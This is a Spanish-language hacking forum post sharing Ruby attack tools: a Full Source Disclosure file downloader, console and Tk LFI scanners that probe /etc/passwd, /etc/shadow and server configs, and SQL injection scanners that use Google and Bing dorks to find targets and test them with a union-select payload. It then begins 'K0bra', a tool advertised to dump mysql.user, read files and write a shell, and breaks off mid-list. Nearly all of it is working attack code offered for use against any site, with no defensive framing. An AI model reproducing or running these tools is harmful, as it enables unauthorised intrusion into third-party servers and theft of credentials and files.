Mensajes

Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure.

El codigo :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#FSD Exploit Manager 0.3

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

def  head
print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end

def installer
if not Dir.exists?("logs")
Dir.mkdir "logs"
end
Dir.chdir("logs")
end

def download(file,name)
File.open(name, "wb") do |saved_file|
open(file, "rb") do |read_file|
saved_file.write(read_file.read)
end
end
end

def scan_fsd(target)
print "\n[+] Scanning ...\n\n"
path = File.basename(URI(target).path)
code = toma(target+path)
if code=~/header\((.*)Content-Disposition: attachment;/
print "[+] Vulnerable !\n"
while(1)
print "\n[+] Insert Filename : "
filename = STDIN.gets.chomp
if filename=="exit"
copyright()
else
download(target+filename,filename)
print "\n[+] Downloaded !\n"
end
end

else
print "[-] Not vulnerable\n"
end
end

target = ARGV[0]

installer()

head()

if !target
uso()
else
scan_fsd(target)
end

copyright()

#The End ?


Eso es todo.

Un simple script en Ruby para scannear la vulnerabilidad LFI en una pagina.

Version consola :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby lfi.rb <page>\n"
end

def  head
print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end

def scan(web)
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
print "\n[+] Testing the vulnerability LFI...\n\n"
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
print "[+] LFI Detected\n\n"
print "[Full Path Discloure]: "+fpd+"\n"
print "\n[+] Fuzzing Files\n\n"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
print "[Link] : "+web+file+"\n"
end
end
print "\n[+] Finish\n"
copyright()
else
print "[-] Not Vulnerable to LFI\n\n"
end
end

#

page = ARGV[0]

head()

if !page
uso()
else
scan(page)
end

copyright()

#The End ?


Version Tk :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

#

window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "cyan"
text "    Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end

web= TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground  "cyan"
command proc{
web = web.value.to_s
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
console.insert("end","[+] LFI Detected\n\n")
console.insert("end","[Full Path Discloure]: "+fpd+"\n")
console.insert("end","\n[+] Fuzzing Files\n\n")
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
console.insert("end","[Link] : "+web+file+"\n")
end
end
console.insert("end","\n[+] Finish")
else
console.insert("end","[-] Not Vulnerable to LFI")
end
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing.

Version consola :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def uso
print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
print "-search_bing : Find in Bing\n"
print "-search_google : Find in Google\n"
print "-scan_bing : Find SQLI in Bing\n"
print "-scan_google : Find SQLI in Google\n"
print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end

def  head
print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

opcion = ARGV[0]
dork = ARGV[1]
pages  = ARGV[2]

head()

if !opcion or !dork or !pages
uso()
else

if opcion=="-search_bing"

print "\n[+] Searching in Bing ...\n\n"

links = bing(dork,pages)

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found\n"
end

links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end

print "\n[+] Finished\n"

elsif opcion=="-search_google"

print "\n[+] Searching in Google ...\n\n"

links = google(dork,pages)

if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = google_recursive(dork,pages)
end

print "[+] Pages Count : "+links.count.to_s

if links.count.to_s=="0"
print "[-] Links not found"
end

links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end

print "\n[+] Finished\n"

elsif opcion=="-scan_bing"

print "\n[+] Searching in Bing ...\n\n"

links = cortar(bing(dork,pages))

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found\n"
end

links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end

print "\n[+] Finished\n"

elsif opcion=="-scan_google"

print "\n[+] Searching in Google ...\n\n"

links = cortar(google(dork,pages))

if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = cortar(google_recursive(dork,pages))
end

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found"
end

links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end

print "\n[+] Finished\n"
else
print "[-] Bad Option"
end
end

copyright()


#The End ?


Version Tk para Google :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

dork = dork.value.to_s
pages = pages.value.to_s

console.insert("end",  "[+] Searching in Google ...\n\n")

links = cortar(google(dork,pages))

if links.count.to_s=="0"
console.insert("end",  "[+] Searching in Google again ...\n\n")
links = cortar(google_recursive(dork,pages))
end

console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

if links.count.to_s=="0"
console.insert("end", "[-] Links not found")
end

links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end"," [FAIL]\n")
end
rescue
console.insert("end", " [FAIL]\n")
end
end

console.insert("end",  "\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Version Tk para Bing :

Código (ruby) [Seleccionar] Expandir


#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

dork = dork.value.to_s
pages = pages.value.to_s

console.insert("end", "[+] Searching in Bing ...\n\n")

links = cortar(bing(dork,pages))

console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

if links.count.to_s=="0"
console.insert("end","[-] Links not found\n")
end

links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end", " [FAIL]\n")
end
rescue
console.insert("end"," [FAIL]\n")
end
end

console.insert("end",  "\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.

Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

• Comprobar vulnerabilidad
  
• Buscar numero de columnas
  
• Buscar automaticamente el numero para mostrar datos
  
• Mostras tablas
  
• Mostrar columnas
  
• Mostrar bases de datos
  
• Mostrar tablas de otra DB
  
• Mostrar columnas de una tabla de otra DB
  
• Mostrar usuarios de mysql.user
  
• Buscar archivos usando load_file
  
• Mostrar un archivo usando load_file
  
• Mostrar valores
  
• Mostrar informacion sobre la DB
  
• Crear una shell usando outfile
  
• Todo se guarda en logs ordenados
  
  El codigo :
  
  
  Código (ruby) [Seleccionar] Expandir
  
#!usr/bin/ruby
#K0bra 0.5
#(C) Doddy Hackman 2015

require "net/http"
require "open-uri"

$files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.